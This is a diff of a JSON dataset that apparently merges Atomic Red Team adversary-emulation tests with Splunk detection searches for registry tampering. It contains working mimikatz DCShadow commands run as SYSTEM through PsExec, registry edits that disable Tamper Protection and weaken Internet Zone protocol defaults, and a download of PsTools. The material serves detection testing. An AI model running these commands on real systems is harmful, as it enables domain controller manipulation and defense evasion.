`\"lsadump::dcshadow /object:bruce.wayne /attribute:badpwdcount /value:9999`\" `\"exit`\"\"\n$dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList \"/c \\..\\ExternalPayloads\\PSTools\\PsExec.exe /accepteula -d -s \\..\\ExternalPayloads\\mimikatz\\x64\\mimikatz.exe $mimikatzParam\"\n\n# wait for fake DC server to be ready...\nStart-Sleep -Seconds 5\n\n# server ready, so trigger replication (push) and wait until it finished\n& \\..\\ExternalPayloads\\mimikatz\\x64\\mimikatz.exe \"lsadump::dcshadow /push\" \"exit\"\n\nWrite-Host \"`nWaiting for fake DC server to return\"\nWait-Process $dc\n\nWrite-Host \"`nOutput from fake DC server:\"\nGet-Content $dc_output_file\nStart-Sleep 1 # wait a little until the file is not locked anymore so we can actually delete it\nRemove-Item $dc_output_file -ErrorAction Ignore\n\nWrite-Host \"End of DCShadow\"\n" + "# starting fake DC server, as SYSTEM (required)\n$dc_output_file = \"\\..\\ExternalPayloads\\art-T1207-mimikatz-DC.log\"\nRemove-Item $dc_output_file -ErrorAction Ignore\n$mimikatzParam =\"`\"log $dc_output_file`\" `\"lsadump::dcshadow /object:bruce.wayne /attribute:badpwdcount /value:9999`\" `\"exit`\"\"\n$dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList \"/c '\\..\\ExternalPayloads\\PSTools\\PsExec.exe' /accepteula -d -s \\..\\ExternalPayloads\\mimikatz\\x64\\mimikatz.exe $mimikatzParam\"\n\n# wait for fake DC server to be ready...\nStart-Sleep -Seconds 5\n\n# server ready, so trigger replication (push) and wait until it finished\n& \"\\..\\ExternalPayloads\\mimikatz\\x64\\mimikatz.exe\" \"lsadump::dcshadow /push\" \"exit\"\n\nWrite-Host \"`nWaiting for fake DC server to return\"\nWait-Process $dc\n\nWrite-Host \"`nOutput from fake DC server:\"\nGet-Content $dc_output_file\nStart-Sleep 1 # wait a little until the file is not locked anymore so we can actually delete it\nRemove-Item $dc_output_file -ErrorAction Ignore\n\nWrite-Host \"End of DCShadow\"\n" ], "commands": [], "queries": [], @@ -311140,13 +313948,13 @@ { "description": "PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path})\n", "prereq_command": "if (Test-Path \"#{psexec_path}\") { exit 0} else { exit 1}\n", - "get_prereq_command": "Invoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip\"\nExpand-Archive PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools -Force\nNew-Item -ItemType Directory (Split-Path \"#{psexec_path}\") -Force | Out-Null\nCopy-Item PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools\\PsExec.exe \"#{psexec_path}\" -Force\n" + "get_prereq_command": "Invoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip\"\nExpand-Archive \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools\" -Force\nNew-Item -ItemType Directory (Split-Path \"#{psexec_path}\") -Force | Out-Null\nCopy-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools\\PsExec.exe\" \"#{psexec_path}\" -Force\n" } ], "executor": { "name": "powershell", "elevation_required": true, - "command": "# starting fake DC server, as SYSTEM (required)\n$dc_output_file = \"PathToAtomicsFolder\\..\\ExternalPayloads\\art-T1207-mimikatz-DC.log\"\nRemove-Item $dc_output_file -ErrorAction Ignore\n$mimikatzParam =\"`\"log $dc_output_file`\" `\"lsadump::dcshadow /object:#{object} /attribute:#{attribute} /value:#{value}`\" `\"exit`\"\"\n$dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList \"/c #{psexec_path} /accepteula -d -s #{mimikatz_path} $mimikatzParam\"\n\n# wait for fake DC server to be ready...\nStart-Sleep -Seconds 5\n\n# server ready, so trigger replication (push) and wait until it finished\n& #{mimikatz_path} \"lsadump::dcshadow /push\" \"exit\"\n\nWrite-Host \"`nWaiting for fake DC server to return\"\nWait-Process $dc\n\nWrite-Host \"`nOutput from fake DC server:\"\nGet-Content $dc_output_file\nStart-Sleep 1 # wait a little until the file is not locked anymore so we can actually delete it\nRemove-Item $dc_output_file -ErrorAction Ignore\n\nWrite-Host \"End of DCShadow\"\n", + "command": "# starting fake DC server, as SYSTEM (required)\n$dc_output_file = \"PathToAtomicsFolder\\..\\ExternalPayloads\\art-T1207-mimikatz-DC.log\"\nRemove-Item $dc_output_file -ErrorAction Ignore\n$mimikatzParam =\"`\"log $dc_output_file`\" `\"lsadump::dcshadow /object:#{object} /attribute:#{attribute} /value:#{value}`\" `\"exit`\"\"\n$dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList \"/c '#{psexec_path}' /accepteula -d -s #{mimikatz_path} $mimikatzParam\"\n\n# wait for fake DC server to be ready...\nStart-Sleep -Seconds 5\n\n# server ready, so trigger replication (push) and wait until it finished\n& \"#{mimikatz_path}\" \"lsadump::dcshadow /push\" \"exit\"\n\nWrite-Host \"`nWaiting for fake DC server to return\"\nWait-Process $dc\n\nWrite-Host \"`nOutput from fake DC server:\"\nGet-Content $dc_output_file\nStart-Sleep 1 # wait a little until the file is not locked anymore so we can actually delete it\nRemove-Item $dc_output_file -ErrorAction Ignore\n\nWrite-Host \"End of DCShadow\"\n", "cleanup_command": "Stop-Process -Name \"mimikatz\" -Force -ErrorAction Ignore\n" } } @@ -313534,6 +316342,8 @@ "reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Features\" /v \"TamperProtection\" /t REG_DWORD /d 0 /f\n", "$typicalPath = \"HKLM:\\SOFTWARE\\Classes\\.wav\\OpenWithProgIds\"; $randomBytes = New-Object Byte[] 0x1000; (New-Object Random).NextBytes($randomBytes); New-ItemProperty -Path $typicalPath -Name \"AtomicSnake\" -Value $randomBytes -PropertyType Binary -Force | Out-Null\n", "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v \"MaxConnectionsPerServer\" /t REG_DWORD /d 10 /f\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v \"MaxConnectionsPer1_0Server\" /t REG_DWORD /d 10 /f\n", + "reg add \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults\" /v http /t REG_DWORD /d 0 /F\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults\" /v https /t REG_DWORD /d 0 /F\n", + "# Set the registry values for http and https to 0\nSet-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults' -Name 'http' -Value 0\nSet-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults' -Name 'https' -Value 0\n", "powershell/persistence/misc/disable_machine_acct_change" ], "commands": [], @@ -314668,6 +317478,32 @@ "name": "command_prompt", "elevation_required": true } + }, + { + "name": "Modify Internet Zone Protocol Defaults in Current User Registry - cmd", + "auto_generated_guid": "c88ef166-50fa-40d5-a80c-e2b87d4180f7", + "description": "This test simulates an adversary modifying the Internet Zone Protocol Defaults in the registry of the currently logged-in user using the reg.exe utility via the command prompt. Such modifications can be indicative of an adversary trying to weaken browser security settings. Upon execution, if successful, the message \"The operation completed successfully.\" will be displayed.\nTo verify the effects of the test:\n1. Open the Registry Editor (regedit.exe).\n2. Navigate to \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults\".\n3. Check for the presence of the \"http\" and \"https\" DWORD values set to `0`.\nOr run:\n```batch\nreg query \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults\"\n```\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg add \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults\" /v http /t REG_DWORD /d 0 /F\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults\" /v https /t REG_DWORD /d 0 /F\n", + "cleanup_command": "reg add \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults\" /v http /t REG_DWORD /d 3 /F\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults\" /v https /t REG_DWORD /d 3 /F\n", + "name": "command_prompt" + } + }, + { + "name": "Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell", + "auto_generated_guid": "b1a4d687-ba52-4057-81ab-757c3dc0d3b5", + "description": "This test simulates an adversary modifying the Internet Zone Protocol Defaults in the registry of the currently logged-in user using PowerShell. Such modifications can be indicative of an adversary attempting to weaken browser security settings. \nTo verify the effects of the test:\n1. Open the Registry Editor (regedit.exe).\n2. Navigate to \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults\".\n3. Check for the presence of the \"http\" and \"https\" DWORD values set to `0`.\nOr run:\n```powershell\nGet-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults' | Select-Object http,https\n```\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "# Set the registry values for http and https to 0\nSet-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults' -Name 'http' -Value 0\nSet-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults' -Name 'https' -Value 0\n", + "cleanup_command": "# Restore the registry values for http and https to 3\nSet-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults' -Name 'http' -Value 3\nSet-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults' -Name 'https' -Value 3\n", + "name": "powershell" + } } ] } @@ -315307,7 +318143,7 @@ { "name": "Disable Registry Tool", "description": "This search identifies modification of registry to disable the regedit or registry tools of the windows operating system. Since registry tool is a swiss knife in analyzing registry, malware such as RAT or trojan Spy disable this application to prevent the removal of their registry entry such as persistence, file less components and defense evasion.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_registry_tool_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.user Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_registry_tool_filter`", "tags": { "name": "Disable Registry Tool", "analytic_story": [ @@ -315415,7 +318251,7 @@ { "name": "Disable Security Logs Using MiniNt Registry", "description": "This analytic is to detect a suspicious registry modification to disable security audit logs. This technique was shared by a researcher to disable Security logs of windows by adding this registry. The Windows will think it is WinPE and will not log any event to the Security Log", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\Control\\\\MiniNt\\\\*\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_security_logs_using_minint_registry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\Control\\\\MiniNt\\\\*\") BY _time span=1h Registry.user Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_security_logs_using_minint_registry_filter`", "tags": { "name": "Disable Security Logs Using MiniNt Registry", "analytic_story": [ @@ -315429,7 +318265,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "modified/added/deleted registry entry $Registry.registry_path$ in $dest$", + "message": "Modified/added/deleted registry entry $registry_path$ in $dest$", "mitre_attack_id": [ "T1112" ], @@ -315491,7 +318327,7 @@ { "name": "Disable Show Hidden Files", "description": "The following analytic is to identify a modification in the Windows registry to prevent users from seeing all the files with hidden attributes. This event or techniques are known on some worm and trojan spy malware that will drop hidden files on the infected machine.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE ((Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt\" Registry.registry_value_data = \"0x00000001\") OR (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden\" Registry.registry_value_data = \"0x00000000\")) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_show_hidden_files_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE ((Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt\" Registry.registry_value_data = \"0x00000001\") OR (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden\" Registry.registry_value_data = \"0x00000000\")) BY _time span=1h Registry.user Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_show_hidden_files_filter`", "tags": { "name": "Disable Show Hidden Files", "analytic_story": [ @@ -315628,7 +318464,7 @@ { "name": "Disable Windows App Hotkeys", "description": "This analytic detects a suspicious registry modification to disable Windows hotkey (shortcut keys) for native Windows applications. This technique is commonly used to disable certain or several Windows applications like `taskmgr.exe` and `cmd.exe`. This technique is used to impair the analyst in analyzing and removing the attacker implant in compromised systems.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\" AND Registry.registry_value_data= \"HotKey Disabled\" AND Registry.registry_value_name = \"Debugger\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_windows_app_hotkeys_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\" AND Registry.registry_value_data= \"HotKey Disabled\" AND Registry.registry_value_name = \"Debugger\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_windows_app_hotkeys_filter`", "tags": { "name": "Disable Windows App Hotkeys", "analytic_story": [ @@ -315735,8 +318571,8 @@ }, { "name": "Disabling CMD Application", - "description": "this search is to identify modification in registry to disable cmd prompt application. This technique is commonly seen in RAT, Trojan or WORM to prevent triaging or deleting there samples through cmd application which is one of the tool of analyst to traverse on directory and files.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\DisableCMD\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_cmd_application_filter`", + "description": "This search is to identify modification in registry to disable cmd prompt application. This technique is commonly seen in RAT, Trojan or WORM to prevent triaging or deleting there samples through cmd application which is one of the tool of analyst to traverse on directory and files.", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\DisableCMD\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_cmd_application_filter`", "tags": { "name": "Disabling CMD Application", "analytic_story": [ @@ -315851,7 +318687,7 @@ { "name": "Disabling ControlPanel", "description": "this search is to identify registry modification to disable control panel window. This technique is commonly seen in malware to prevent their artifacts , persistence removed on the infected machine.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoControlPanel\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_controlpanel_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoControlPanel\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_controlpanel_filter`", "tags": { "name": "Disabling ControlPanel", "analytic_story": [ @@ -315966,7 +318802,7 @@ { "name": "Disabling NoRun Windows App", "description": "This search is to identify modification of registry to disable run application in window start menu. this application is known to be a helpful shortcut to windows OS user to run known application and also to execute some reg or batch script. This technique is used malware to make cleaning of its infection more harder by preventing known application run easily through run shortcut.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_norun_windows_app_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_norun_windows_app_filter`", "tags": { "name": "Disabling NoRun Windows App", "analytic_story": [ @@ -316081,7 +318917,7 @@ { "name": "Enable WDigest UseLogonCredential Registry", "description": "This analytic is to detect a suspicious registry modification to enable plain text credential feature of windows. This technique was used by several malware and also by mimikatz to be able to dumpe the a plain text credential to the compromised or target host. This TTP is really a good indicator that someone wants to dump the crendential of the host so it must be a good pivot for credential dumping techniques.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\System\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest\\\\*\" Registry.registry_value_name = \"UseLogonCredential\" Registry.registry_value_data=0x00000001) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `enable_wdigest_uselogoncredential_registry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\System\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest\\\\*\" Registry.registry_value_name = \"UseLogonCredential\" Registry.registry_value_data=0x00000001) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `enable_wdigest_uselogoncredential_registry_filter`", "tags": { "name": "Enable WDigest UseLogonCredential Registry", "analytic_story": [ @@ -316563,7 +319399,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -316769,7 +319605,7 @@ { "name": "Windows Disable Change Password Through Registry", "description": "This analytic is to detect a suspicious registry modification to disable change password feature of the windows host. This registry modification may disables the Change Password button on the Windows Security dialog box (which appears when you press Ctrl+Alt+Del). As a result, users cannot change their Windows password on demand. This technique was seen in some malware family like ransomware to prevent the user to change the password after ownning the network or a system during attack. This windows feature may implemented by administrator to prevent normal user to change the password of a critical host or server, In this type of scenario filter is needed to minimized false positive.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableChangePassword\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_change_password_through_registry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableChangePassword\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_change_password_through_registry_filter`", "tags": { "name": "Windows Disable Change Password Through Registry", "analytic_story": [ @@ -316838,7 +319674,7 @@ { "name": "Windows Disable Lock Workstation Feature Through Registry", "description": "This analytic is to detect a suspicious registry modification to disable Lock Computer windows features. This registry modification prevent the user from locking its screen or computer that are being abused by several malware for example ransomware. This technique was used by threat actor to make its payload more impactful to the compromised host.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableLockWorkstation\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_lock_workstation_feature_through_registry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableLockWorkstation\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_lock_workstation_feature_through_registry_filter`", "tags": { "name": "Windows Disable Lock Workstation Feature Through Registry", "analytic_story": [ @@ -316908,7 +319744,7 @@ { "name": "Windows Disable LogOff Button Through Registry", "description": "This analytic is to detect a suspicious registry modification to disable logoff feature in windows host. This registry when enable will prevent users to log off of the system by using any method, including programs run from the command line, such as scripts. It also disables or removes all menu items and buttons that log the user off of the system. This technique was seen abused by ransomware malware to make the compromised host un-useful and hard to remove other registry modification made on the machine that needs restart to take effect. This windows feature may implement by administrator in some server where shutdown is critical. In that scenario filter of machine and users that can modify this registry is needed.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\*\" Registry.registry_value_name IN (\"NoLogOff\", \"StartMenuLogOff\") Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_logoff_button_through_registry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\*\" Registry.registry_value_name IN (\"NoLogOff\", \"StartMenuLogOff\") Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_logoff_button_through_registry_filter`", "tags": { "name": "Windows Disable LogOff Button Through Registry", "analytic_story": [ @@ -316977,7 +319813,7 @@ { "name": "Windows Disable Notification Center", "description": "The following search identifies a modification of registry to disable the windows notification center feature in a windows host machine. This registry modification removes notification and action center from the notification area on the task bar. This modification are seen in RAT malware to cover their tracks upon downloading other of its component or other payload.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_value_name= \"DisableNotificationCenter\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_notification_center_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_value_name= \"DisableNotificationCenter\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_notification_center_filter`", "tags": { "name": "Windows Disable Notification Center", "analytic_story": [ @@ -317053,7 +319889,7 @@ { "name": "Windows Disable Shutdown Button Through Registry", "description": "This analytic is to detect a suspicious registry modification to disable shutdown button on the logon user. This technique was seen in several malware especially in ransomware family like killdisk malware variant to make the compromised host un-useful and hard to remove other registry modification made on the machine that needs restart to 